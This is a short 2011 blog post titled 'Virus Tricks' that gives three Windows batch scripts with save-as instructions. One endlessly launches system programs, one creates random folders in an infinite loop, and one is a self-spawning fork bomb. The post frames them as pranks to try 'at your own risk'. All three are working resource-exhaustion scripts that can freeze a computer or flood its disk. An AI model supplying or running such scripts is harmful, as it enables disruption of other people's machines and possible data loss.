Saturday, October 22, 2011

Virus Tricks

1.Application Bomber

open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as vipul.bat

2.Batch File Tricks(create 3000 folder in a single minute).txt
open notepad and type
@echo off
:loop
md %random%
goto loop
saveas vipul.bat

3.Cool Batch File Tricks.txt
open notepad and type
@echo off
start
%0
goto :start
save as vipul.bat

More tips will update soon..
Note: try it at your own risk.

No comments:

Post a Comment